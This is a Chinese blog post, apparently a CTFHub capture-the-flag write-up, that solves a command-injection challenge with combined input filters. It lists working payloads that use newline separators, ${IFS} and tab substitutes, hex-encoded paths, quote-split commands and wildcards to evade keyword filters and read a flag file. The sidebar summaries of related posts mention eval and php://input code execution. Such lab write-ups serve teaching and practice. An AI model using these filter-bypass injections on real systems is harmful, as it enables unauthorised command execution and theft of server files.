CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入-综合过滤练习

最新推荐文章于 2025-04-24 08:00:00 发布
最新推荐文章于 2025-04-24 08:00:00 发布
阅读量746 收藏 9
点赞数 5
分类专栏: CTFHUB解题思路 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Static______/article/details/141326686
版权

CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入-综合过滤练习

根据题目提示
在这里插入图片描述

以及代码

在这里插入图片描述

法1:

分隔符可以使用%0a代替
若直接使用文本框上传命令会导致字符被转义,直接访问URL

payload:

/?ip=127.0.0.1%0als 
也就是=> 127.0.0.1;ls

在这里插入图片描述

接下来要访问flag_is_here,需要绕过空格过滤、flag文字过滤并且显示文件夹的内容

(space)` => `${IFS}

对于文件夹的内容,使用$(printf "路径")代替路径
对于路径文字过滤,转换成16进制字符串

访问URL

?ip=127.0.0.1%0als${IFS}$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65")
上这段话的意思就是:ip=127.0.0.1;ls flag_is_here

在这里插入图片描述

接着绕过cat,使用16进制字符串(HEX)访问文件即可

cat => ca''t / `ca""t

/?ip=127.0.0.1%0aca''t${IFS}$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x39\x34\x33\x32\x34\x33\x38\x33\x31\x35\x30\x32\x30\x2e\x70\x68\x70")
=> 127.0.0.1;c'a't flag_is_here/flag_11510361119666.php

法2:

用more替换cat
用%0a去替换; 
空格用${IFS}替换 
flag可以用正则替换f*** 
flag可以用TAB加*替换,不过要用url编码TAB,表示为%09加*

输入命令

127.0.0.1%0als

使用%0a代替 ;

使用正则表达式代替flag,使用{IFS}代替空格,此处注意传cd到文件夹下以后,要使用ls将文件加下的文件列出来。最后输入命令

127.0.0.1%0acd${IFS}f***_is_here
${IFS}%0als

输入命令

ip=127.0.0.1%0acd${IFS}f***_is_here
${IFS}%0amore
${IFS}f***_5222980724357.php

,获取到flag

url表

在这里插入图片描述
在这里插入图片描述

%0a 代替 换行 , %09 代替 TAB键 (因为flag被过滤了,所以我们通过TAB来补全flag_is_here)

   %5c 代替 \(用 \ 来分隔开 cat ,因为 cat 也被过滤了qwq)

法3:

查看flag_is_here文件夹下的文件:

?ip=127.0.0.1%0als*#*

?ip127.0.0.1%0als%09*is_here

?ip127.0.0.1%0acd%09*_is_here%0aca%5ct%09*_73122415714959.php

`
?ip127.0.0.1%0als%09*is_here

?ip127.0.0.1%0acd%09*_is_here%0aca%5ct%09*_73122415714959.php
CTFHub技能树webRCE(一)
wzhwzh123321的博客
02-18 855
根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval是将一串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求,file为php://input使得POST参数可以作为原始请求的数据,使用bp抓包,即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串,意思是如果file的前六个字符为php://,那么就会包含file文件。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7862
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub-技能树-web-RCE
yuqie的博客
06-14 532
RCE(Remote Code/Command Execute)远程代码/命令执行的漏洞。攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
CTFHub技能树rce
最新发布
star3119391396的博客
04-24 541
审计代码,发现过滤了flag关键字,include包含文件的内容,根据提示,发现有个shell.txt文件,而且文件内容是接受传参请求,可以利用这个漏洞。过滤三个关键字cat,flag,ctfhub,可以使用两个单引号或者两个双引号绕过。,可以使用%0a来作为回车符使用,效果一样。有个phpinfo()的网页,打开,搜索flag,没有。根据代码和提示,要使用php协议读取目录/flag。过滤了目录分隔符,但是可以使用命令拼接来找flag。过滤空格,可以使用${IFS}绕过。过滤了cat,但是可以用tac。
CTFHUB技能树-命令注入RCE综合练习
zguohuai的博客
03-15 900
CTFHUB攻防世界解决命令综合注入
CTFHUB-web-RCE-综合过滤练习
weixin_68416970的博客
08-07 294
用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过。查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、;发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问。
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 7421
CTFHubRCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2560
RCE简介: 初学RCE远程命令/代码执行漏洞)https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
ctfhub技能树webRCE里的eval执行和命令注入
2302_81010533的博客
03-30 630
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
CTFHUB-web-RCE
ookami6497的博客
12-03 1709
CTFHub技能树webRCE(二)
wzhwzh123321的博客
02-20 1295
打开phpinfo,可以看到allow_url_fopen和allow_url_include都是On,因此可以使用php://input,由于代码会检查file中的内容,因此不能够使用php://filter包含文件,使用php://input通过hackbar使用POST方式发包,抓包并在最后一行加php代码执行。使用%0a拼接cd%09*_is_here进入flag文件所在的目录中,由于cat被过滤因此使用tac,再使用%0a拼接tac%09*输出flag文件内容,构造语句为?
CTFHUB-技能树-Web-RCE远程代码执行-远程包含-命令注入-过滤cat
Static______的博客
07-17 376
过滤cat就是找个能代替的。
CTFHub 技能树rce
weixin_63231007的博客
05-18 1372
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
ctfhub--技能树rce
lulu001128的博客
02-28 932
思路
CTFHub 技能树 -RCE
qq_63963927的博客
10-16 300
可知,题目已经提供了一句话木马,所以我们的目标就是在index页面包含shell.txt,然后将ctfhub参数传入,以执行我们想要执行的命令,这里还需要注意,传入的命令中不能包含flag字符串,这里可以使用通配符来绕过。根据页面的源码,知道可以GET方式传入一个file参数,传入的file将会被inlcude包含,因此被包含文件中的命令也会被当做PHP指令执行。发现文件夹flag_is_here,接下来我们使用cd命令,进入到文件夹,ls查看这个文件的内容。所以可以使用php://input来执行命令
CTFHub技能书解笔记-RCE-综合过滤练习
qq_43006864的博客
04-06 3320
直接开综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢? 估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。 这里我们慢慢绕过吧。一层层过。 首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。 进行利用,发现;可以通过%0a代替 ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资...
CTFHub技能树web(持续更新)--RCE--命令注入--综合过滤练习
jiuyongpinyin的博客
01-27 2671
综合过滤练习 这道试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接 我是大佬链接 这道过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改: ?ip=127.0.0.1%0als# 看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全: ?ip=127.0.0.
CTFHub技能树web(持续更新)--RCE--命令注入--过滤目录分隔符
jiuyongpinyin的博客
01-26 1221
过滤目录分隔符 首先我们依然是ls查看当前目录: 发现这里没有后缀了,再根据题目的提示,这就是个文件,我们需要进去,但是目录分隔符被过滤了,那么 ls …/ 这种命令就不能用了,那么我们先使用反斜杠查看这个文件夹里面的东东: 127.0.0.1 & ls \flag_is_here 看到了这个文件,然后我们应该如何查看呢,我们可以使用分号将命令同时执行,那么我们就是进入文件夹,读取文件: 127.0.0.1 & cd flag_is_here;cat flag_18147299093
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值